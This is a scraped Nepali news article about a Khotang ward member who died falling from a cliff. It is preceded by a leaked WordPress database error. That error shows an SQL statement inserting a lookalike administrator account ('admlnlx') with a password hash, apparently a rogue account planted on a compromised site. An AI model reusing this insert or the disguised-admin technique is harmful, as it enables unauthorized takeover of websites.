WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8ULl3cI6EYLCCKabJ2eMupodNmgCk.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 14:58:43', '', 'admlnlx', 'admlnlx')
खोटाङ । खोटाङको साकेला गाउँपालिका–२ रतन्छा मबुका वडा सदस्य रत्नप्रसाद फुयाँलको भिरबाट लडेर मृत्यु भएको छ । रतन्छाबाट आफ्नो घर मबु जाने क्रममा स्थानीय वाकुर्तुम जङ्गलमा रहेको ठूलो भिरबाट लडेका वडासदस्य फुयाँलको घटनास्थलमै मृत्यु भएको हो ।
करीब ३०० मिटर तल खसेका फुयाँलको घटनास्थलमै मृत्यु भएको रतन्छाका वडाध्यक्ष उन्नत राईले बताए । धामीझाँक्रीको कामसमेत गर्दै आएका फुुयाँल शनिबार साँझ धामी कामकै लागि मबु जानेक्रममा भिरबाट लडेको वडाध्यक्ष राईले जानकारी दिए ।
फुयाँल विसं २०७४ को स्थानीय तहको निर्वाचनमा तत्कालीन नेकपा (माओवादी केन्द्र)बाट वडा सदस्यमा विजयी हुनुभएको थियो । मृतकको शव परीक्षणका लागि जिल्ला अस्पताल दिक्तेल ल्याइएको प्रहरीले जनाएको छ ।